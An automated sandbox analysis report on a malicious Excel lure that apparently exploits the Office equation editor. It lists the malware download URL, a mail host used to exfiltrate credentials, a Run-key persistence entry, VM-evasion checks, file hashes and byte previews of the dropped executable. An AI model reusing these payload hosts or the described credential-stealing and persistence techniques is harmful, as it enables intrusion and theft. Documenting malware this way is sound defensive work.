Process tree recovered from the graph (child processes, dropped files and contacted hosts):
• EQNEDT32.EXE (started)
  • Contacts 192.3.141.146 (ports 49165, 80; AS-COLOCROSSINGUS, United States)
  • Dropped: C:\Users\user\AppData\Local\...\vbc[1].exe (PE32)
  • Dropped: C:\Users\Public\vbc.exe (PE32)
  • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • Starts vbc.exe
    • Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes
    • Starts vbc.exe
      • Contacts mail.alkhaleejautoparts.com, 148.66.138.106 (ports 49166, 49167, 587; AS-26496-GO-DADDY-COM-LLCUS, Singapore)
      • Dropped: C:\Users\user\AppData\Roaming\...\tnvLnx.exe (PE32)
      • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; 2 other signatures
• tnvLnx.exe (started)
  • Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes
  • Starts tnvLnx.exe
• tnvLnx.exe (started)
  • Starts tnvLnx.exe
• EXCEL.EXE (started)
  • Dropped: C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx (data)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
AGG POWER RFQ.xlsx | 28% | Virustotal |
AGG POWER RFQ.xlsx | 22% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205
7.2.tnvLnx.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1138205
9.2.tnvLnx.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1138205

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://192.3.141.146/win/vbc.exe | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://DTHLcG.com | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://gN3yhO7qZ2vk1Dl2x8.com | 0% | Avira URL Cloud | safe
https://api.ipify.org% | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://mail.alkhaleejautoparts.com | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.alkhaleejautoparts.com | 148.66.138.106 | true | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://192.3.141.146/win/vbc.exe | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://DTHLcG.com | tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://www.%s.comPA | vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://gN3yhO7qZ2vk1Dl2x8.com | vbc.exe, 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2367250713.0000000002894000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/georgw777/MediaManager | tnvLnx.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000004.00000002.2155151223.0000000002401000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221949010.0000000002401000.00000004.00000001.sdmp | false | | high
https://api.ipify.org% | vbc.exe, 00000005.00000002.2367072067.00000000027C8000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | vbc.exe, 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | false | | high
https://github.com/georgw777/ | tnvLnx.exe | false | | high
https://github.com/georgw777/MediaManager;https://github.com/georgw777/ | vbc.exe, 00000004.00000000.2148405134.0000000000AD2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2366734790.0000000000AD2000.00000020.00020000.sdmp, tnvLnx.exe, 00000006.00000002.2221233725.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000007.00000000.2220311506.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp | false | | high
http://mail.alkhaleejautoparts.com | vbc.exe, 00000005.00000002.2367334115.00000000028BB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
148.66.138.106 | mail.alkhaleejautoparts.com | Singapore | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
192.3.141.146 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                    General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 435321
Start date: 16.06.2021
Start time: 12:16:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: AGG POWER RFQ.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@12/22@7/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 2.5% (good quality ratio 2.1%)
• Quality average: 60.5%
• Quality standard deviation: 33.8%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
12:21:06 | API Interceptor | 77x Sleep call for process: EQNEDT32.EXE modified
12:21:09 | API Interceptor | 941x Sleep call for process: vbc.exe modified
12:21:32 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
12:21:41 | API Interceptor | 710x Sleep call for process: tnvLnx.exe modified
12:21:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection
148.66.138.106 | Statement of Account.exe | malicious
 | Dv3nvr3mMaDxvbv.exe | malicious
 | NEW Quotation.exe | malicious
 | JEB2dgkadl.exe | malicious
 | Invoice.exe | malicious
 | SOA.exe | malicious
 | NEW UPDATED SOA.exe | malicious
 | Quotation.exe | malicious
 | NEW PURCHASE ORDER .exe.exe | malicious
 | FEB SOA.exe | malicious
 | INVOICE.exe | malicious
 | SOA.exe | malicious
 | statement of account.exe | malicious
 | INVOICE.exe | malicious
 | Bank Account details.exe | malicious
 | payment details.exe | malicious

                                                                    Domains

Match | Associated Sample Name / URL | Detection | Context
mail.alkhaleejautoparts.com | Dv3nvr3mMaDxvbv.exe | malicious | 148.66.138.106

                                                                    ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | Request for Quotation (RFQ).xlsx | malicious | 192.227.228.121
 | INQUIRY for IFM 20207.xlsx | malicious | 192.227.158.74
 | Citibank Payment Advice.xlsx | malicious | 192.227.158.111
 | Tax Document.docx | malicious | 198.12.107.38
 | Order Specification.docx | malicious | 192.3.141.164
 | pNsKDtmW1R.exe | malicious | 192.210.198.12
 | Du1H1Py8wy.exe | malicious | 192.210.198.12
 | vbc.xlsx | malicious | 107.173.219.35
 | yiEfe07buY.exe | malicious | 192.210.198.12
 | LjbPCz3fpH.exe | malicious | 192.210.198.12
 | cdmo7vIyjC.exe | malicious | 198.12.127.155
 | Proforma Invoice.xlsx | malicious | 198.12.127.155
 | e#U03c2.xlsx | malicious | 192.227.228.121
 | SX-L21182 #U9ece#U5df4#U5ae9EST new order.xlsx | malicious | 192.227.158.72
 | OYlyw8sDsH.exe | malicious | 192.210.198.12
 | AvPRRB6bZr.exe | malicious | 192.210.198.12
 | PO 1032123 - 1032503.xlsx | malicious | 192.210.173.40
 | Policy reminder.xlsx | malicious | 198.12.110.183
 | Swift_Payment.MT103.docx | malicious | 192.3.141.164
 | 24PURcXCp6.exe | malicious | 192.210.198.12
AS-26496-GO-DADDY-COM-LLCUS | Supplier order data sheet For June Delivery PO 4500101880.exe | malicious | 64.202.184.79
 | Statement of Account.exe | malicious | 148.66.138.106
 | gz7dLhKlSQ.exe | malicious | 184.168.131.241
 | ekeson and sons.exe | malicious | 166.62.28.135
 | jZuCbIpwNX.exe | malicious | 184.168.131.241
 | KK71rkO0Tf.exe | malicious | 107.180.41.236
 | LEMO.exe | malicious | 184.168.131.241
 | Enquiry (OUR REF #162620321) (OUR REF # 166060421) Taylor Marine Project.exe | malicious | 184.168.131.241
 | JUN14 OUTSTANDING CONTRACT ORDER-01.xlsx | malicious |
                                                                    • 192.169.223.13
                                                                    Dv3nvr3mMaDxvbv.exeGet hashmaliciousBrowse
                                                                    • 148.66.138.106
                                                                    RFQ.exeGet hashmaliciousBrowse
                                                                    • 198.71.232.3
                                                                    SecuriteInfo.com.Trojan.DownLoader.origin.7477.dllGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Wire_receipt.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    New_Order.xllGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Shipping Doc578.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    AWB 6299764041.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    PR#28201909R1.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Products inquiry list 06619.exeGet hashmaliciousBrowse
                                                                    • 50.62.160.230
                                                                    invoice#56432_Pdf.exeGet hashmaliciousBrowse
                                                                    • 166.62.10.181
                                                                    Purchase_Order.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:downloaded
                                                                    Size (bytes):1120768
                                                                    Entropy (8bit):7.255968902164593
                                                                    Encrypted:false
                                                                    SSDEEP:12288:njjwxQMYvquwaHpLN39wfDM5prFXcZl+w5PTK787vEtC0pEyXEiyV4Gq:gxGquPHpLN39wfg5piR9KI7IiyUiyD
                                                                    MD5:42520170FE48AF70B3711BF86BDE77B0
                                                                    SHA1:8AF1983ADFF968D63D210145629F12EDBB4D1292
                                                                    SHA-256:E4FCC9753E14EBA1107DA53046098456E353EFDD9F81D88BD7199CC262E43E64
                                                                    SHA-512:29A865325E7E7708E4CFFD1AD5DBAC134D34D3AB1A369177E445F8FD12F2DAAD039AFDEEA0DA38C49B9323F3934404CA379FC7823EFBF431ED7136FC57907980
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    IE Cache URL:http://192.3.141.146/win/vbc.exe
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..`............................>.... ........@.. ....................................@....................................K............................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc.......`......................@..B................ .......H........'...............+...|..........................................j+.&.(....(....(.....o....*..0..........+.&.+.&.(....(....9....& ....8g.....(.... .....:U...&..(.... ....(....:>...&..(.... ....8,.....(.... .....9....&..(....82... ............E........................t...........8....& ....8....*.V+.&..(....(....(....*..V+.&..(....(....(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o"...*.J+.&
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F51718A.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):50311
                                                                    Entropy (8bit):7.960958863022709
                                                                    Encrypted:false
                                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\20D9C003.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):8815
                                                                    Entropy (8bit):7.944898651451431
                                                                    Encrypted:false
                                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DDAF228.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):79394
                                                                    Entropy (8bit):7.864111100215953
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36823C09.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):29499
                                                                    Entropy (8bit):7.667442162526095
                                                                    Encrypted:false
                                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                                    Malicious:false
                                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37086ED0.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):50311
                                                                    Entropy (8bit):7.960958863022709
                                                                    Encrypted:false
                                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                    Malicious:false
                                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CDE61C7.jpeg
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):29499
                                                                    Entropy (8bit):7.667442162526095
                                                                    Encrypted:false
                                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                                    Malicious:false
                                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EAF411C.png
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):49744
                                                                    Entropy (8bit):7.99056926749243
                                                                    Encrypted:true
                                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                    Malicious:false
